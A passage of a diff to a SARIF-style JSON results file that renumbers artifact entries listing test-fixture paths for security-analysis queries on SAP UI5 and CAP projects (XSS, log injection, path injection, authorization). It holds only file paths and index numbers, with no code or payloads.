"%SRCROOT%", - "index" : 186 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 187 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 188 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 189 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 190 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 191 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 192 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 193 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 194 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 195 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 196 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 198 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 199 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 200 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/utils/CustomLogListener.js", - "uriBaseId" : "%SRCROOT%", - "index" : 201 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 202 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 203 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 204 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 205 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 207 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 208 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 209 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 210 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 211 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 212 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 213 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 214 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 215 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 216 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 217 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 218 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 219 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 220 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 221 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 222 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 223 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 224 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 225 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 226 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 227 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 228 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 229 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 230 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 231 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 232 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 233 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 234 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 235 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 236 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", - "uriBaseId" : "%SRCROOT%", - "index" : 237 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 238 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 239 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 240 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/Component.js", - "uriBaseId" : "%SRCROOT%", - "index" : 241 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 242 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", - "uriBaseId" : "%SRCROOT%", - "index" : 243 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 244 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 245 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/model/todoitems.json", - "uriBaseId" : "%SRCROOT%", - "index" : 246 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/AllJourneys.js", - "uriBaseId" : "%SRCROOT%", - "index" : 247 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/FilterJourney.js", - "uriBaseId" : "%SRCROOT%", - "index" : 248 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/SearchJourney.js", - "uriBaseId" : "%SRCROOT%", - "index" : 249 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/TodoListJourney.js", - "uriBaseId" : "%SRCROOT%", - "index" : 250 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/arrangements/Startup.js", - "uriBaseId" : "%SRCROOT%", - "index" : 251 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.html", - "uriBaseId" : "%SRCROOT%", - "index" : 252 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.js", - "uriBaseId" : "%SRCROOT%", - "index" : 253 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/pages/App.js", - "uriBaseId" : "%SRCROOT%", - "index" : 254 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.html", - "uriBaseId" : "%SRCROOT%", - "index" : 255 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.js", - "uriBaseId" : "%SRCROOT%", - "index" : 256 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/AllTests.js", - "uriBaseId" : "%SRCROOT%", - "index" : 257 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/controller/App.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 258 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.html", - "uriBaseId" : "%SRCROOT%", - "index" : 259 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.js", - "uriBaseId" : "%SRCROOT%", - "index" : 260 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/util/Helper.js", - "uriBaseId" : "%SRCROOT%", - "index" : 261 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/view/App.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 262 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 263 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 264 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 265 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 266 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 267 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 268 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 269 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 270 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 271 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 272 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 273 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 274 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 275 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 276 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 277 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 278 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 279 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 280 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 281 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 282 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 283 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 284 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 285 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 286 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 287 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 288 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 289 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 290 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 291 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 292 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 293 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 294 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 295 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 296 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 297 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 298 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 299 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 300 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 301 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 302 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 303 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 304 - } - }, { + } ], + "executionSuccessful" : true + } ], + "artifacts" : [ { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 305 + "index" : 0 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/manifest.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 306 + "index" : 1 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 307 + "index" : 2 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package-lock.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 308 + "index" : 3 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 309 + "index" : 4 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/ui5.yaml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 310 + "index" : 5 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 311 + "index" : 6 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.html", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 312 + "index" : 7 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 313 + "index" : 8 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/manifest.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 314 + "index" : 9 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 315 + "index" : 10 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package-lock.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 316 + "index" : 11 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 317 + "index" : 12 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/ui5.yaml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 318 + "index" : 13 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 319 + "index" : 14 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.html", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 320 + "index" : 15 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 321 + "index" : 16 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/manifest.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 322 + "index" : 17 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 323 + "index" : 18 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package-lock.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 324 + "index" : 19 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 325 + "index" : 20 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/ui5.yaml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 326 + "index" : 21 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 327 + "index" : 22 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.html", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 328 + "index" : 23 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.js", + "uri" : 